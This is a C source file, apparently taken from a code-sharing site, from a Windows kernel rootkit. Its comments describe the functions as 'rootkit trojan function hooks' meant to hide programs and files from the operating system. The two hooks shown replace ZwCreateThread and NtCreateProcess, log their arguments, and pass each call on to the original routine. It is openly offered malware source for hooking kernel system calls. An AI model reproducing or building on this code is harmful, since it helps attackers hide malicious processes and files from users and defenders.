?? rk_process.c
字號:
#include "rk_driver.h"
#include "rk_process.h"
/* process manager routines */
/* _______________________________________________________________________
. rootkit trojan function hooks. These are the meat and potatos kids.
. Each of these functions is performing the duty of an original
. kernel routine. The rootkit must alter the behavior of these functions
. to hide programs and files from the operating system.
. _______________________________________________________________________ */
/* ________________________________________________
. watch thread creation
. ________________________________________________ */
NTSTATUS NewZwCreateThread(
OUT PHANDLE phThread,
IN ACCESS_MASK AccessMask,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE hProcess,
OUT PCLIENT_ID pClientId,
IN PCONTEXT pContext,
OUT PSTACKINFO pStackInfo,
IN BOOLEAN bSuspended
)
{
int rc;
STACKINFO StackInfo;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewZwCreateThread() from %s\n", aProcessName);
DumpObjectAttributes(ObjectAttributes);
if(bSuspended) DbgPrint("create suspended\n");
DumpContext(pContext);
/* dump stack info */
if(pStackInfo)
{
DbgPrint("StackInfo.TopOfStack=0x%X\n", pStackInfo->TopOfStack);
DbgPrint("StackInfo.BottomOfStack=0x%X\n", pStackInfo->BottomOfStack);
DbgPrint("StackInfo.OnePageBelowTopOfStack=0x%X\n", pStackInfo->OnePageBelowTopOfStack);
}
DbgPrint("parent process 0x%X\n", hProcess);
rc = ((ZWCREATETHREAD)(OldZwCreateThread)) (
phThread,
AccessMask,
ObjectAttributes,
hProcess,
pClientId,
pContext,
pStackInfo,
bSuspended
);
if(phThread) DbgPrint("thread handle 0x%X\n", *phThread);
DbgPrint("ZwCreateThread : rc = %x\n", rc);
DumpContext(pContext);
return rc;
}
/* _________________________________________________________
. usually no object attributes - just a hSection pointer.
. _________________________________________________________ */
NTSTATUS NewNtCreateProcess(
OUT PHANDLE phProcess,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN HANDLE hParentProcess,
IN BOOLEAN bInheritParentHandles,
IN HANDLE hSection OPTIONAL,
IN HANDLE hDebugPort OPTIONAL,
IN HANDLE hExceptionPort OPTIONAL)
{
int rc;
char ParentDirectory[1024];
PUNICODE_STRING Parent=NULL;
CHAR aProcessName[PROCNAMELEN];
GetProcessName( aProcessName );
DbgPrint("rootkit: NewNtCreateProcess() from %s\n", aProcessName);
DumpObjectAttributes(ObjectAttributes);
if(hSection) DbgPrint("rootkit: launching NtCreateProcess w/ hSection 0x%X\n", hSection);
rc=((NTCREATEPROCESS)(OldNtCreateProcess)) (
phProcess,
DesiredAccess,
ObjectAttributes,
hParentProcess,
bInheritParentHandles,
hSection,
hDebugPort,
hExceptionPort);
if(phProcess) DbgPrint("rootkit: phProcess 0x%X\n", *phProcess);
DbgPrint("rootkit: NtCreateProcess : rc = %x\n", rc);
return rc;
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -